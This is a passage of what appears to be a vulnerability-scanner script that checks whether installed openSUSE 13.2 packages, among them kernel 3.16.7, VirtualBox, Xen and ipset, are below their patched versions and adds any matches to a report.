rpm:\"cloop-kmp-default~2.639_k3.16.7_42~14.20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-kmp-default-debuginfo\", rpm:\"cloop-kmp-default-debuginfo~2.639_k3.16.7_42~14.20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-kmp-desktop\", rpm:\"cloop-kmp-desktop~2.639_k3.16.7_42~14.20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-kmp-desktop-debuginfo\", rpm:\"cloop-kmp-desktop-debuginfo~2.639_k3.16.7_42~14.20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-kmp-xen\", rpm:\"cloop-kmp-xen~2.639_k3.16.7_42~14.20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-kmp-xen-debuginfo\", rpm:\"cloop-kmp-xen-debuginfo~2.639_k3.16.7_42~14.20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash\", rpm:\"crash~7.0.8~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-debuginfo\", rpm:\"crash-debuginfo~7.0.8~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-debugsource\", rpm:\"crash-debugsource~7.0.8~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-devel\", rpm:\"crash-devel~7.0.8~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-doc\", rpm:\"crash-doc~7.0.8~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-eppic\", rpm:\"crash-eppic~7.0.8~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-eppic-debuginfo\", rpm:\"crash-eppic-debuginfo~7.0.8~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-gcore\", rpm:\"crash-gcore~7.0.8~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-gcore-debuginfo\", rpm:\"crash-gcore-debuginfo~7.0.8~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-kmp-default\", rpm:\"crash-kmp-default~7.0.8_k3.16.7_42~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-kmp-default-debuginfo\", rpm:\"crash-kmp-default-debuginfo~7.0.8_k3.16.7_42~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-kmp-desktop\", rpm:\"crash-kmp-desktop~7.0.8_k3.16.7_42~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-kmp-desktop-debuginfo\", rpm:\"crash-kmp-desktop-debuginfo~7.0.8_k3.16.7_42~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-kmp-xen\", rpm:\"crash-kmp-xen~7.0.8_k3.16.7_42~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-kmp-xen-debuginfo\", rpm:\"crash-kmp-xen-debuginfo~7.0.8_k3.16.7_42~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-debugsource\", rpm:\"hdjmod-debugsource~1.28~18.21.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-default\", rpm:\"hdjmod-kmp-default~1.28_k3.16.7_42~18.21.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-default-debuginfo\", rpm:\"hdjmod-kmp-default-debuginfo~1.28_k3.16.7_42~18.21.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-desktop\", rpm:\"hdjmod-kmp-desktop~1.28_k3.16.7_42~18.21.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-desktop-debuginfo\", rpm:\"hdjmod-kmp-desktop-debuginfo~1.28_k3.16.7_42~18.21.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-xen\", rpm:\"hdjmod-kmp-xen~1.28_k3.16.7_42~18.21.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-xen-debuginfo\", rpm:\"hdjmod-kmp-xen-debuginfo~1.28_k3.16.7_42~18.21.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset\", rpm:\"ipset~6.23~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-debuginfo\", rpm:\"ipset-debuginfo~6.23~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-debugsource\", rpm:\"ipset-debugsource~6.23~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-devel\", rpm:\"ipset-devel~6.23~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-default\", rpm:\"ipset-kmp-default~6.23_k3.16.7_42~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-default-debuginfo\", rpm:\"ipset-kmp-default-debuginfo~6.23_k3.16.7_42~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-desktop\", rpm:\"ipset-kmp-desktop~6.23_k3.16.7_42~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-desktop-debuginfo\", rpm:\"ipset-kmp-desktop-debuginfo~6.23_k3.16.7_42~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-xen\", rpm:\"ipset-kmp-xen~6.23_k3.16.7_42~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-xen-debuginfo\", rpm:\"ipset-kmp-xen-debuginfo~6.23_k3.16.7_42~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base-debuginfo\", rpm:\"kernel-default-base-debuginfo~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2\", rpm:\"kernel-ec2~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-base\", rpm:\"kernel-ec2-base~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-devel\", rpm:\"kernel-ec2-devel~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-build\", rpm:\"kernel-obs-build~3.16.7~42.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-build-debugsource\", rpm:\"kernel-obs-build-debugsource~3.16.7~42.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-qa\", rpm:\"kernel-obs-qa~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-qa-xen\", rpm:\"kernel-obs-qa-xen~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libipset3\", rpm:\"libipset3~6.23~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libipset3-debuginfo\", rpm:\"libipset3-debuginfo~6.23~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock\", rpm:\"pcfclock~0.44~260.20.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-debuginfo\", rpm:\"pcfclock-debuginfo~0.44~260.20.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-debugsource\", rpm:\"pcfclock-debugsource~0.44~260.20.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-kmp-default\", rpm:\"pcfclock-kmp-default~0.44_k3.16.7_42~260.20.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-kmp-default-debuginfo\", rpm:\"pcfclock-kmp-default-debuginfo~0.44_k3.16.7_42~260.20.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-kmp-desktop\", rpm:\"pcfclock-kmp-desktop~0.44_k3.16.7_42~260.20.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-kmp-desktop-debuginfo\", rpm:\"pcfclock-kmp-desktop-debuginfo~0.44_k3.16.7_42~260.20.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-virtualbox\", rpm:\"python-virtualbox~5.0.20~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-virtualbox-debuginfo\", rpm:\"python-virtualbox-debuginfo~5.0.20~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-debugsource\", rpm:\"vhba-kmp-debugsource~20140629~2.20.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-default-\", rpm:\"vhba-kmp-default~20140629_k3.16.7_42~2.20.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-default-debuginfo-\", rpm:\"vhba-kmp-default-debuginfo~20140629_k3.16.7_42~2.20.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-desktop-\", rpm:\"vhba-kmp-desktop~20140629_k3.16.7_42~2.20.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-desktop-debuginfo-\", rpm:\"vhba-kmp-desktop-debuginfo~20140629_k3.16.7_42~2.20.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-xen-\", rpm:\"vhba-kmp-xen~20140629_k3.16.7_42~2.20.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-xen-debuginfo-\", rpm:\"vhba-kmp-xen-debuginfo~20140629_k3.16.7_42~2.20.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox\", rpm:\"virtualbox~5.0.20~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-debuginfo\", rpm:\"virtualbox-debuginfo~5.0.20~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-debugsource\", rpm:\"virtualbox-debugsource~5.0.20~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-devel\", rpm:\"virtualbox-devel~5.0.20~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-kmp-default\", rpm:\"virtualbox-guest-kmp-default~5.0.20_k3.16.7_42~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-kmp-default-debuginfo\", rpm:\"virtualbox-guest-kmp-default-debuginfo~5.0.20_k3.16.7_42~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-kmp-desktop\", rpm:\"virtualbox-guest-kmp-desktop~5.0.20_k3.16.7_42~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-kmp-desktop-debuginfo\", rpm:\"virtualbox-guest-kmp-desktop-debuginfo~5.0.20_k3.16.7_42~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-tools\", rpm:\"virtualbox-guest-tools~5.0.20~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-tools-debuginfo\", rpm:\"virtualbox-guest-tools-debuginfo~5.0.20~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-x11\", rpm:\"virtualbox-guest-x11~5.0.20~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-x11-debuginfo\", rpm:\"virtualbox-guest-x11-debuginfo~5.0.20~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-kmp-default\", rpm:\"virtualbox-host-kmp-default~5.0.20_k3.16.7_42~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-kmp-default-debuginfo\", rpm:\"virtualbox-host-kmp-default-debuginfo~5.0.20_k3.16.7_42~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-kmp-desktop\", rpm:\"virtualbox-host-kmp-desktop~5.0.20_k3.16.7_42~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-kmp-desktop-debuginfo\", rpm:\"virtualbox-host-kmp-desktop-debuginfo~5.0.20_k3.16.7_42~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-qt\", rpm:\"virtualbox-qt~5.0.20~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-qt-debuginfo\", rpm:\"virtualbox-qt-debuginfo~5.0.20~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-websrv\", rpm:\"virtualbox-websrv~5.0.20~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-websrv-debuginfo\", rpm:\"virtualbox-websrv-debuginfo~5.0.20~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-debugsource\", rpm:\"xen-debugsource~4.4.4_02~46.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-devel\", rpm:\"xen-devel~4.4.4_02~46.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-libs\", rpm:\"xen-libs~4.4.4_02~46.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-libs-debuginfo\", rpm:\"xen-libs-debuginfo~4.4.4_02~46.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools-domU\", rpm:\"xen-tools-domU~4.4.4_02~46.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools-domU-debuginfo\", rpm:\"xen-tools-domU-debuginfo~4.4.4_02~46.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons\", rpm:\"xtables-addons~2.6~22.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-debuginfo\", rpm:\"xtables-addons-debuginfo~2.6~22.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-debugsource\", rpm:\"xtables-addons-debugsource~2.6~22.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-kmp-default\", rpm:\"xtables-addons-kmp-default~2.6_k3.16.7_42~22.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-kmp-default-debuginfo\", rpm:\"xtables-addons-kmp-default-debuginfo~2.6_k3.16.7_42~22.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-kmp-desktop\", rpm:\"xtables-addons-kmp-desktop~2.6_k3.16.7_42~22.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-kmp-desktop-debuginfo\", rpm:\"xtables-addons-kmp-desktop-debuginfo~2.6_k3.16.7_42~22.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-kmp-xen\", rpm:\"xtables-addons-kmp-xen~2.6_k3.16.7_42~22.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-kmp-xen-debuginfo\", rpm:\"xtables-addons-kmp-xen-debuginfo~2.6_k3.16.7_42~22.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-base\", rpm:\"kernel-debug-base~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-base-debuginfo\", rpm:\"kernel-debug-base-debuginfo~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-debugsource\", rpm:\"kernel-debug-debugsource~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel-debuginfo\", rpm:\"kernel-debug-devel-debuginfo~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop\", rpm:\"kernel-desktop~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-base\", rpm:\"kernel-desktop-base~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-base-debuginfo\", rpm:\"kernel-desktop-base-debuginfo~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-debuginfo\", rpm:\"kernel-desktop-debuginfo~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-debugsource\", rpm:\"kernel-desktop-debugsource~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-devel\", rpm:\"kernel-desktop-devel~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-base-debuginfo\", rpm:\"kernel-ec2-base-debuginfo~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-debuginfo\", rpm:\"kernel-ec2-debuginfo~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-debugsource\", rpm:\"kernel-ec2-debugsource~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla\", rpm:\"kernel-vanilla~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-debuginfo\", rpm:\"kernel-vanilla-debuginfo~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-debugsource\", rpm:\"kernel-vanilla-debugsource~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-devel\", rpm:\"kernel-vanilla-devel~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base-debuginfo\", rpm:\"kernel-xen-base-debuginfo~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.4.4_02~46.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-doc-html\", rpm:\"xen-doc-html~4.4.4_02~46.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-default\", rpm:\"xen-kmp-default~4.4.4_02_k3.16.7_42~46.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-default-debuginfo\", rpm:\"xen-kmp-default-debuginfo~4.4.4_02_k3.16.7_42~46.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-desktop\", rpm:\"xen-kmp-desktop~4.4.4_02_k3.16.7_42~46.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-desktop-debuginfo\", rpm:\"xen-kmp-desktop-debuginfo~4.4.4_02_k3.16.7_42~46.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-libs-32bit\", rpm:\"xen-libs-32bit~4.4.4_02~46.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-libs-debuginfo-32bit\", rpm:\"xen-libs-debuginfo-32bit~4.4.4_02~46.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools\", rpm:\"xen-tools~4.4.4_02~46.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools-debuginfo\", rpm:\"xen-tools-debuginfo~4.4.4_02~46.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-docs\", rpm:\"kernel-docs~3.16.7~42.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-macros\", rpm:\"kernel-macros~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source-vanilla\", rpm:\"kernel-source-vanilla~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-desktop-icons\", rpm:\"virtualbox-guest-desktop-icons~5.0.20~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-source\", rpm:\"virtualbox-host-source~5.0.20~48.5\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bbswitch-kmp-pae\", rpm:\"bbswitch-kmp-pae~0.8_k3.16.7_42~3.20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bbswitch-kmp-pae-debuginfo\", rpm:\"bbswitch-kmp-pae-debuginfo~0.8_k3.16.7_42~3.20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-kmp-pae\", rpm:\"cloop-kmp-pae~2.639_k3.16.7_42~14.20.3\", rls:\"openSUSE13.2\"))) {\n report += 